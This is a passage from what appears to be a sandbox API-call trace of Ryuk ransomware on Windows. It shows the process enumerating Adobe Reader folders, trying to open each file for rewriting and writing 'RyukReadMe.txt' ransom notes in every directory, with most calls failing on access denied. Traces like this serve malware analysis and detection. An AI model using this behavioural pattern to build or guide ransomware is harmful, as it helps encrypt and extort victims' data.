(lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.361] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\tur\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.361] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.361] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.361] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.362] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.362] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\tur\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.362] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.362] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.362] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.362] SetLastError (dwErrCode=0x0) [0138.362] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\tur\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.362] GetLastError () returned 0x5 [0138.362] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.362] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.362] SetLastError (dwErrCode=0x0) [0138.362] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.362] GetLastError () returned 0x5 [0138.362] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.362] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.362] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.363] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.363] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.363] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.363] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.363] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.363] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.363] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.363] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.363] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.363] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.364] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.364] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.364] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.364] SetLastError (dwErrCode=0x0) [0138.364] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.364] GetLastError () returned 0x5 [0138.364] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.364] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.364] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.364] SetLastError (dwErrCode=0x0) [0138.364] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.364] GetLastError () returned 0x5 [0138.364] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.364] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.364] SetLastError (dwErrCode=0x0) [0138.364] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.364] GetLastError () returned 0x5 [0138.365] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.365] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.365] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0138.365] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.365] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.365] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.365] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\JSByteCodeWin.bin", dwFileAttributes=0x80) returned 0 [0138.365] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\JSByteCodeWin.bin" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\javascripts\\jsbytecodewin.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.365] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.365] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.365] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.366] SetLastError (dwErrCode=0x0) [0138.366] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\javascripts\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.366] GetLastError () returned 0x5 [0138.366] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.366] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.366] SetLastError (dwErrCode=0x0) [0138.366] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.366] GetLastError () returned 0x5 [0138.366] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.366] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.366] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0138.367] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.367] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.367] SetLastError (dwErrCode=0x0) [0138.367] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.368] GetLastError () returned 0x5 [0138.368] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.368] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.368] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.368] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.368] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.368] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.369] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT\\license.html", dwFileAttributes=0x80) returned 0 [0138.369] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cat\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.369] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.369] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.369] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.369] SetLastError (dwErrCode=0x0) [0138.369] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.369] GetLastError () returned 0x5 [0138.369] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.369] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.369] SetLastError (dwErrCode=0x0) [0138.369] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.369] GetLastError () returned 0x5 [0138.369] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.370] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.370] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.370] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.370] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.370] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.371] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS\\license.html", dwFileAttributes=0x80) returned 0 [0138.371] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\chs\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.371] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.371] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.372] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.373] SetLastError (dwErrCode=0x0) [0138.373] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\chs\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.373] GetLastError () returned 0x5 [0138.373] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.373] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.373] SetLastError (dwErrCode=0x0) [0138.373] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.373] GetLastError () returned 0x5 [0138.373] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.373] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.373] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.374] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.374] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.374] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.374] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT\\license.html", dwFileAttributes=0x80) returned 0 [0138.374] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cht\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.374] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.374] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.374] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.374] SetLastError (dwErrCode=0x0) [0138.375] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cht\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.375] GetLastError () returned 0x5 [0138.375] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.375] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.375] SetLastError (dwErrCode=0x0) [0138.375] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.375] GetLastError () returned 0x5 [0138.375] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.375] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.375] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.376] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.376] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.376] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.376] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\license.html", dwFileAttributes=0x80) returned 0 [0138.376] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cze\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.377] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.377] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.377] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.377] SetLastError (dwErrCode=0x0) [0138.377] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cze\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.377] GetLastError () returned 0x5 [0138.377] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.377] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.377] SetLastError (dwErrCode=0x0) [0138.377] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.377] GetLastError () returned 0x5 [0138.377] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.377] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.377] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.378] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.378] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.378] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.378] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN\\license.html", dwFileAttributes=0x80) returned 0 [0138.379] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\dan\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.379] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.379] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.379] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.379] SetLastError (dwErrCode=0x0) [0138.379] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\dan\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.379] GetLastError () returned 0x5 [0138.379] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.379] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.379] SetLastError (dwErrCode=0x0) [0138.379] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.379] GetLastError () returned 0x5 [0138.379] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.379] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.380] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.380] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.380] FindNextFileW (in: 